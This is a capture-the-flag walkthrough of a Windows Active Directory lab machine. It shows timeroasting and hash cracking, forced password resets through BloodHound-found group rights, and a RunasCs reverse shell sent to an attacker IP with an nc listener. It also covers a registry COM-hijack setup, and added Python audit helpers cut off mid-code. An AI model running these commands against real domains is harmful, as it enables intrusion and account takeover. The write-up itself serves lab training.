# HTB | RustyKey

Machine - <https://app.hackthebox.com/machines/RustyKey>

IP - 10.129.100.71

Description - As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A

## NMAP

```java
└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,3269,5985,9389,47001,49664,49666,49670,49673,49674,49677,49692,56212 10.129.100.71 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 11:18 IST
Nmap scan report for 10.129.100.71
Host is up (0.82s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 13:48:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
56212/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-29T13:49:44
|_  start_date: N/A
|_clock-skew: 8h00m04s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.84 seconds
```

### SMB / LDAP

```java
└─$ netexec smb 10.129.99.237 -u rr.parker -p '8#t5HE8L!W3A'
SMB         10.129.99.237   445    10.129.99.237    [*]  x64 (name:10.129.99.237) (domain:10.129.99.237) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.99.237   445    10.129.99.237    [-] 10.129.99.237\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
```

We can see that **NTLM** authentication is disabled (`NTLM:False`), so we switch to **Kerberos** and authenticate successfully:

```java
└─$ impacket-getTGT 'rustykey.htb/rr.parker:8#t5HE8L!W3A'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in rr.parker.ccache
```

```java
└─$ netexec ldap 10.129.99.237 -u rr.parker -p '8#t5HE8L!W3A' -k
LDAP        10.129.99.237   389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.129.99.237   389    DC               [+] rustykey.htb\rr.parker:8#t5HE8L!W3A

```

### Bloodhound

```java
└─$ bloodhound-python -u 'rr.parker' -p '8#t5HE8L!W3A' -d rustykey.htb -ns 10.129.100.71 -c All --zip
```

We get the list of usernames from the BloodHound zip.

We can see the members of the `Remote Management Users` group, which gives a reasonable guess at which accounts hold the user flag; from there we can manually explore their Inbound Object Control in BloodHound to find an AD path to them.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FyAwPUnzuJRElUwlYuy3o%2Fimage.png?alt=media&#x26;token=59c61966-f92c-4aa6-9a61-fb2b37cfdd62" alt=""><figcaption></figcaption></figure>

Now we have three candidates: `EE.REED`, `GG.ANDERSON` and `BB.MORGAN`.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FXKZupdCSMqcUGxJJcQ5I%2Fimage.png?alt=media&#x26;token=b1761692-bf33-4475-8873-9aad3139ca68" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fiec60NcWKM1hDJr9L5EZ%2Fimage.png?alt=media&#x26;token=7838efd3-3cb5-45dc-bbd9-f8d8cced74ad" alt=""><figcaption></figcaption></figure>

`HELPDESK` -> ForceChangePassword -> `BB.MORGAN`

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fp6we2xjOeswRKPVGqvpa%2Fimage.png?alt=media&#x26;token=c6094f2f-6f15-4b21-9eb9-678feb784e74" alt=""><figcaption></figcaption></figure>

Now we need to find a way to reach `HELPDESK`.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fen6MixMBU4eIk4UIz3lv%2Fimage.png?alt=media&#x26;token=8dcbe275-0053-4d59-8bd8-bd03e828acef" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FQxbf6ZyEWc68j4TN6ZC3%2Fimage.png?alt=media&#x26;token=c580f64f-6f21-4205-8db2-c5360ce909c2" alt=""><figcaption></figcaption></figure>

Now we have two options: get credentials for either `NN.MARCOS` or `IT-COMPUTER3`.

## Foothold/ Shell

### Shell as BB.Morgan

The path that will give us a shell looks like `IT-COMPUTER3` -> `HELPDESK` -> `BB.MORGAN`.

#### **Timeroasting**

Timeroasting is a technique that abuses the NTP service on a domain controller to obtain **MD5-based authentication digests** keyed with the password hashes of domain accounts (in practice computer and trust accounts, as the quote below explains). These digests can be cracked offline to recover plaintext passwords. The attack targets Microsoft's authenticated NTP extension (**MS-SNTP**), in which the DC authenticates its NTP reply with a digest derived from the requesting account's password.

There is a white paper on Timeroasting (refer to [this](https://cybersecurity.bureauveritas.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)) and a git [repo](https://github.com/SecuraBV/Timeroast):

> Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.

```java
└─$ python3 timeroast.py 10.129.60.209
1000:$sntp-ms$6b739430d088d593e0679f39c8e5d424$1c0111e900000000000a0fd44c4f434cec0ecfa8ee3acad7e1b8428bffbfcd0aec0ee487464b1fb9ec0ee487464b3588
1103:$sntp-ms$fc9850f29ca329477cde72d2dd1e93cf$1c0111e900000000000a0fd44c4f434cec0ecfa8ebd0020be1b8428bffbfcd0aec0ee487f7d7ce88ec0ee487f7d86587
1104:$sntp-ms$937ddfce9fed6efecf9dde5e20eb12ef$1c0111e900000000000a0fd44c4f434cec0ecfa8ebd165b8e1b8428bffbfcd0aec0ee487f7d97f62ec0ee487f7d9acaf
1105:$sntp-ms$02ee43305a252680f77bac8462b42639$1c0111e900000000000a0fd44c4f434cec0ecfa8ed4a1c83e1b8428bffbfcd0aec0ee48809313a34ec0ee4880931afa5
1107:$sntp-ms$3a4376d1bdff7a3ee53a97830cc90b50$1c0111e900000000000a0fd44c4f434cec0ecfa8ed5649b8e1b8428bffbfcd0aec0ee488093da221ec0ee488093dc202
1106:$sntp-ms$25240db6725293f421be71632df6c008$1c0111e900000000000a0fd44c4f434cec0ecfa8ed4b6a61e1b8428bffbfcd0aec0ee4880932aea8ec0ee4880932e961
1118:$sntp-ms$0a3aec69b5c387b26b0fb061efcfdbd4$1c0111e900000000000a0fd44c4f434cec0ecfa8ed53d138e1b8428bffbfcd0aec0ee488195bf345ec0ee488195c0fcb
1119:$sntp-ms$fa9c9efec37ec2e2ea7d786a03402e75$1c0111e900000000000a0fd44c4f434cec0ecfa8ed55d29ae1b8428bffbfcd0aec0ee488195dea96ec0ee488195e1635
1120:$sntp-ms$944d9fbf111f556e8c86bf1f0c97630f$1c0111e900000000000a0fd44c4f434cec0ecfa8ed6fdf8be1b8428bffbfcd0aec0ee4881977f935ec0ee48819781fcc
1121:$sntp-ms$ce4d5392114a433ea7b3c4935e71b9b2$1c0111e900000000000a0fd44c4f434cec0ecfa8ed7155ade1b8428bffbfcd0aec0ee488197972b2ec0ee488197995ee
1122:$sntp-ms$5a7fe7ac440a4563198972c761d9e176$1c0111e900000000000a0fd44c4f434cec0ecfa8ed99780be1b8428bffbfcd0aec0ee48819a19363ec0ee48819a1b84c
1123:$sntp-ms$19dd83d824166332e08a02bfb35df35b$1c0111e900000000000a0fd44c4f434cec0ecfa8ee6bd1e0e1b8428bffbfcd0aec0ee4882e6b7faaec0ee4882e6bf51b
1125:$sntp-ms$00b0a3277cb03b54f242668e11638d98$1c0111e900000000000a0fd44c4f434cec0ecfa8eea84380e1b8428bffbfcd0aec0ee4882ea821f2ec0ee4882ea855f4
1124:$sntp-ms$2f7e53fd9cf9aef37b13059a489cc4ab$1c0111e900000000000a0fd44c4f434cec0ecfa8ee6d2b7ce1b8428bffbfcd0aec0ee4882e6cffddec0ee4882e6d414b
1126:$sntp-ms$bf2b0f76de6ddcd79fee273626014758$1c0111e900000000000a0fd44c4f434cec0ecfa8eeb30b5ae1b8428bffbfcd0aec0ee4882eb2e9ccec0ee4882eb3212a
1127:$sntp-ms$8261b4ca39a936d18d871b5dc70e2b6d$1c0111e900000000000a0fd44c4f434cec0ecfa8eed1cce6e1b8428bffbfcd0aec0ee4882ed1a4a2ec0ee4882ed1df5b

```

We can get the SID of `IT-COMPUTER3` either from BloodHound or from its JSON data:

```java
└─$ cat 20250702022932_computers.json | jq -r '.data[] | "\(.Properties.samaccountname) \(.ObjectIdentifier)"'
IT-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1127
IT-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1126
IT-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1125
IT-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1124
IT-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1123
Finance-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1122
Finance-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1121
Finance-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1120
Finance-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1119
Finance-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1118
Support-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1107
Support-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1106
Support-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1105
Support-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1104
Support-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1103
DC$ S-1-5-21-3316070415-896458127-4139322052-1000
```
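The mapping above, as an added Python example that is not part of the original write-up: it parses timeroast.py output lines (the two lines for RIDs 1000 and 1125 are copied from above), extracts the RID from each computer's SID in a BloodHound-style `computers.json` (a constructed sample with the same shape the jq command reads; the `pwdlastset` epochs are invented), and decodes the 48-byte NTP reply that serves as the hash's salt. The `stale_computer_accounts` check is the defender-side counterpart: computer accounts whose password has not rotated in months are the ones most likely to still carry a crackable non-standard password. The assumption that `pwdlastset` is exported as a Unix epoch is mine.

```python
import json
import re
import struct

# Constructed sample in the shape of the BloodHound computers.json queried above with jq;
# SIDs and names are the ones listed above, the pwdlastset epochs are invented for this example
SAMPLE_COMPUTERS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": "S-1-5-21-3316070415-896458127-4139322052-1000",
     "Properties": {"samaccountname": "DC$", "pwdlastset": 1750000000}},
    {"ObjectIdentifier": "S-1-5-21-3316070415-896458127-4139322052-1103",
     "Properties": {"samaccountname": "Support-Computer1$", "pwdlastset": 1700000000}},
    {"ObjectIdentifier": "S-1-5-21-3316070415-896458127-4139322052-1125",
     "Properties": {"samaccountname": "IT-Computer3$", "pwdlastset": 1709000000}},
]})

# Two timeroast.py lines copied from above: rid:$sntp-ms$<md5 digest>$<48-byte NTP reply, hex>
SAMPLE_TIMEROAST = """
1000:$sntp-ms$6b739430d088d593e0679f39c8e5d424$1c0111e900000000000a0fd44c4f434cec0ecfa8ee3acad7e1b8428bffbfcd0aec0ee487464b1fb9ec0ee487464b3588
1125:$sntp-ms$00b0a3277cb03b54f242668e11638d98$1c0111e900000000000a0fd44c4f434cec0ecfa8eea84380e1b8428bffbfcd0aec0ee4882ea821f2ec0ee4882ea855f4
"""

TIMEROAST_RE = re.compile(
    r"^(?P<rid>\d+):\$sntp-ms\$(?P<digest>[0-9a-f]{32})\$(?P<packet>[0-9a-f]{96})$")


def rid_from_sid(sid):
    """The relative identifier is the last sub-authority of the SID."""
    return int(sid.rsplit("-", 1)[1])


def load_computers(raw_json):
    """Index computer objects by RID, which is what timeroast output is keyed on."""
    return {rid_from_sid(c["ObjectIdentifier"]): c for c in json.loads(raw_json)["data"]}


def parse_timeroast(text):
    """Return {rid: (digest_hex, packet_hex)} for every well-formed hash line."""
    out = {}
    for line in text.splitlines():
        m = TIMEROAST_RE.match(line.strip())
        if m:
            out[int(m["rid"])] = (m["digest"], m["packet"])
    return out


def decode_ntp_reply(packet_hex):
    """Decode the header of the 48-byte NTP reply that forms the 'salt' of the hash."""
    pkt = bytes.fromhex(packet_hex)
    li_vn_mode, stratum, poll, precision = struct.unpack_from(">BBBb", pkt, 0)
    refid = pkt[12:16]                      # ASCII source name for stratum 0/1 servers
    return {
        "version": (li_vn_mode >> 3) & 0x7,
        "mode": li_vn_mode & 0x7,           # 4 = server reply
        "stratum": stratum,
        "poll": poll,
        "precision": precision,             # signed log2 seconds
        "refid": refid.decode("ascii", "replace") if stratum <= 1 else refid.hex(),
    }


def name_timeroast_hashes(timeroast_text, computers_json):
    """Map each roasted RID to its samAccountName (None when the RID is not a known computer)."""
    comps = load_computers(computers_json)
    return {rid: (comps[rid]["Properties"]["samaccountname"] if rid in comps else None)
            for rid in parse_timeroast(timeroast_text)}


def stale_computer_accounts(computers_json, now_epoch, max_age_days=90):
    """Computer accounts whose password is older than max_age_days: the candidates for a
    non-rotated (possibly default) password that timeroasting can crack offline."""
    cutoff = now_epoch - max_age_days * 86400
    stale = [c["Properties"]["samaccountname"] for c in json.loads(computers_json)["data"]
             if c["Properties"].get("pwdlastset", 0) < cutoff]
    return sorted(stale)
```

On real data, feed `name_timeroast_hashes` the full timeroast output and the full `computers.json`; any RID that maps to `None` is a trust account or an object missing from the collection and deserves a manual look.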

#### Cracking the hash

We need to crack the hash for RID 1125, which belongs to `IT-Computer3$` (hashcat mode 31300 is MS-SNTP):

```java
└─$ hashcat -m 31300 sntp_hash /home/anurag/stuff/rockyou.txt --username
```

We get the password `Rusty88!` for `IT-Computer3$`.

We can confirm the credential via netexec:

```java
└─$ netexec ldap 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\IT-Computer3$:Rusty88!
```

#### AddSelf to Helpdesk

```java
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k add groupMember "HelpDesk" "IT-Computer3$"
[+] IT-Computer3$ added to HelpDesk
```

Now we can change the password for `bb.morgan`:

#### ForceChangePassword

```java
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password bb.morgan 'P@ssw0rd@123'
[+] Password changed successfully!
```

When we try to validate the new credentials, we get `KDC_ERR_ETYPE_NOSUPP`:

```java
└─$ netexec ldap 10.10.11.75 -u 'bb.morgan' -p 'P@ssw0rd@123' -k
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [-] rustykey.htb\bb.morgan:P@ssw0rd@123 KDC_ERR_ETYPE_NOSUPP
```

> `KDC_ERR_ETYPE_NOSUPP` error indicates that the KDC does not support the encryption type our tools are using for those accounts.

Let's look at the BloodHound result again.

We can see that `BB.MORGAN` -> MemberOf -> `IT` -> MemberOf -> `PROTECTED OBJECTS` -> MemberOf -> `PROTECTED USERS`:

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F7zYszKG9Vwc3jXSVHcxY%2Fimage.png?alt=media&#x26;token=b73cd857-eefd-457d-974a-38e504e56a07" alt=""><figcaption></figcaption></figure>

The key issue is likely the **`PROTECTED USERS` group**. Users in this group have **restrictions** that:

1. **Disallow the use of NTLM, Digest, and CredSSP**.
2. Only allow **Kerberos** with **AES encryption**.
3. Disallow delegation, including unconstrained delegation.

This explains the `KDC_ERR_ETYPE_NOSUPP` error: our tools requested a ticket with a weak encryption type (RC4), which members of Protected Users are not allowed to use.

Since `HELPDESK` -> AddMember -> `PROTECTED OBJECTS` -> MemberOf -> `PROTECTED USERS`, we can remove `IT` from `PROTECTED OBJECTS`. `BB.MORGAN` then no longer inherits the Protected Users restrictions, so we can change the password again and authenticate.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FYNARL1COO44eILfVMeFY%2Fimage.png?alt=media&#x26;token=411bf756-745b-40a2-9250-e6fc243bbe11" alt=""><figcaption></figcaption></figure>

```java
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k remove groupMember "Protected Objects" "IT"
[-] IT removed from Protected Objects

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password bb.morgan 'P@ssw0rd@123'
[+] Password changed successfully!

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ netexec ldap 10.10.11.75 -u 'bb.morgan' -p 'P@ssw0rd@123' -k
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\bb.morgan:P@ssw0rd@123
```

#### GetTGT for bb.morgan

evil-winrm is not working with the password, so we need to get a TGT for `bb.morgan` and authenticate with Kerberos instead:

```java
└─$ netexec smb  DC.RUSTYKEY.HTB -u rr.parker -p '8#t5HE8L!W3A' -k --generate-krb5-file krb5.conf
SMB         DC.RUSTYKEY.HTB 445    DC               [*]  x64 (name:DC) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.RUSTYKEY.HTB 445    DC               [+] RUSTYKEY.HTB\rr.parker:8#t5HE8L!W3A

└─$ impacket-getTGT rustykey.htb/'bb.morgan':'P@ssw0rd@123' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in bb.morgan.ccache

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ export KRB5CCNAME=bb.morgan.ccache

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ export KRB5_CONFIG=./krb5.conf

```

```java
└─$ evil-winrm -r rustykey.htb -i dc.rustykey.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents>
```

We find `user.txt` on the Desktop:

```java
    Directory: C:\Users\bb.morgan\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---         7/2/2025   3:32 AM             34 user.txt
```

## Privilege Escalation

### Shell as EE.Reed

We can see there is a PDF, `internal.pdf`; let's copy it to our machine and open it:

```java
Internal Memo
From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100
Hey team,
As part of the new Support utilities rollout, extended access has been temporarily granted to allow
testing and troubleshooting of file archiving features across shared workstations.
This is mainly to help streamline ticket resolution related to extraction/compression issues reported
by the Finance and IT teams. Some newer systems handle context menu actions differently, so
registry-level adjustments are expected during this phase.
A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed
stable in all environments.
- Let DevOps know if you encounter access errors or missing shell actions.
Thanks,
BB Morgan
IT Department
```

This memo mentions an archiving tool that was granted extended access for testing purposes. It notes that some context menus may not function correctly and that registry-level adjustments may be needed, indicating that the tool's registry entries may have excessive permissions.

`HELPDESK` can change passwords for `DD.ALI`, `EE.REED` and `GG.ANDERSON` as well:

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FLtuMbZphCr8wCEuCedq4%2Fimage.png?alt=media&#x26;token=50313029-73ca-4fd5-bf2c-5bee1b2b7b94" alt=""><figcaption></figcaption></figure>

Since the memo was sent to `SUPPORT`, and we know that `EE.REED` is a member of `SUPPORT` and that `HELPDESK` can change its password, we target `EE.REED`; but first we need to remove `SUPPORT` from `PROTECTED OBJECTS`:

```java
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k remove groupMember "Protected Objects" "SUPPORT"
[-] SUPPORT removed from Protected Objects

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password "ee.reed" 'P@ssw0rd@123'
[+] Password changed successfully!
```

We are not able to authenticate via LDAP, and over SMB we get `STATUS_LOGON_TYPE_NOT_GRANTED`:

```java
└─$ impacket-getTGT rustykey.htb/'ee.reed':'P@ssw0rd@123' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in ee.reed.ccache

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ export KRB5CCNAME=ee.reed.ccache

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ netexec smb DC.RUSTYKEY.HTB -u 'ee.reed' -p 'P@ssw0rd@123' -k
SMB         DC.RUSTYKEY.HTB 445    DC               [*]  x64 (name:DC) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.RUSTYKEY.HTB 445    DC               [-] RUSTYKEY.HTB\ee.reed:P@ssw0rd@123 STATUS_LOGON_TYPE_NOT_GRANTED

```

> This error occurs because the domain join user account lacks the Access this computer from the network user right at the domain controller (DC) servicing the domain join operation.

#### Reverse shell

I tried PSSession, but it gives an error:

```java
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> $password = ConvertTo-SecureString "P@ssw0rd@123" -AsPlainText -Force
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> $cred = New-Object System.Management.Automation.PSCredential("ee.reed", $password)
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> Enter-PSSession -ComputerName dc -Credential $cred
You are currently in a Windows PowerShell PSSession and cannot use the Enter-PSSession cmdlet to enter another PSSession.
At line:1 char:1
+ Enter-PSSession -ComputerName dc -Credential $cred
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Enter-PSSession], ArgumentException
    + FullyQualifiedErrorId : RemoteHostDoesNotSupportPushRunspace,Microsoft.PowerShell.Commands.EnterPSSessionCommand
*Evil-WinRM* PS C:\Users\bb.morgan\Documents>
```

We can use `RunasCs` instead:

```java
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCs.exe ee.reed P@ssw0rd@123 powershell -r 10.10.16.3:1234
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-dc3160d$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 21192 created in background.

```

```java
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ nc -nlvp 1234                                               
listening on [any] 1234 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.75] 53867
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
rustykey\ee.reed
PS C:\Windows\system32>
```

### Shell as mm.turner

#### Writable Registry

We can use the script below to check for writable registry keys under `HKLM:\SOFTWARE` (note that it proves write access by actually creating and deleting a throwaway value in each key):

```java
Get-ChildItem HKLM:\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object {
    try {
        # OpenSubKey wants a path relative to the hive, so drop the HKEY_LOCAL_MACHINE\ prefix
        $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\', '')
        # Open the key writable ($true); this fails or returns $null without write access
        $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true)
        # Prove write access by creating and immediately removing a throwaway value
        $regKey.SetValue('TestWrite', '1')
        $regKey.DeleteValue('TestWrite')
        $regKey.Close()
        $true
    } catch {
        $false
    }
}
```

This returns many keys belonging to `7-Zip`, for example:

```java
    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}

Name                           Property
----                           --------
InprocServer32                 (default)      : C:\Program Files\7-Zip\7-zip.dll
                               ThreadingModel : Apartment
```

We see that the `InprocServer32` key holds a **COM** server DLL path, `C:\Program Files\7-Zip\7-zip.dll`, that gets loaded into the client process whenever this CLSID is instantiated.

Checking the ACL of this key, we see that members of the **Support** domain group have full control over it:

```java
PS C:\temp> Get-Acl 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32' | fl
Get-Acl 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32' | fl

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
Owner  : BUILTIN\Administrators
Group  : RUSTYKEY\Domain Users
Access : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
         BUILTIN\Administrators Allow  FullControl
         CREATOR OWNER Allow  FullControl
         RUSTYKEY\Support Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadKey
Audit  :
Sddl   : O:BAG:DUD:AI(A;CIID;KR;;;AC)(A;ID;KA;;;BA)(A;CIIOID;KA;;;CO)(A;CIID;KA;;;S-1-5-21-3316070415-896458127-4139322052-1132)(A;CIID;KA;;;SY)(A;CIIOID;KA;;;BA)(A;CIID;KR;;;BU)
```
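An added example, not part of the original write-up, that audits the `Sddl` line above in Python rather than by eye: it parses SDDL into owner, group and DACL entries, expands the rights abbreviations to access masks, and reports allow ACEs that grant write-capable rights to principals outside a trusted set. The same parser handles the AD-object rights string used for RBCD later in this write-up (`CCDCLCSWRPWPDTLOCRSDRCWDWO`), so it serves both places; the write-bit definitions and the trusted set are my choices, and the well-known SID table covers only the abbreviations that appear here.

```python
import re

# SDDL rights abbreviations (subset covering registry keys and AD object ACEs)
SDDL_RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,
    "KA": 0x000F003F, "KR": 0x00020019, "KW": 0x00020006, "KX": 0x00020019,
}
# Well-known trustee abbreviations that appear in the output above
WELL_KNOWN_SIDS = {
    "BA": "S-1-5-32-544", "BU": "S-1-5-32-545", "SY": "S-1-5-18",
    "CO": "S-1-3-0", "AC": "S-1-15-2-1", "AU": "S-1-5-11", "WD": "S-1-1-0",
}
# Bits that let a trustee change the object (my definition): generic/standard write rights
# plus the object-specific ones (registry: KEY_SET_VALUE 0x2, KEY_CREATE_SUB_KEY 0x4;
# AD object: CC 0x1, DC 0x2, WP 0x20, DT 0x40)
WRITE_BITS = {
    "registry": 0x10000000 | 0x40000000 | 0x00040000 | 0x00080000 | 0x00010000 | 0x2 | 0x4,
    "ad": 0x10000000 | 0x40000000 | 0x00040000 | 0x00080000 | 0x00010000 | 0x1 | 0x2 | 0x20 | 0x40,
}

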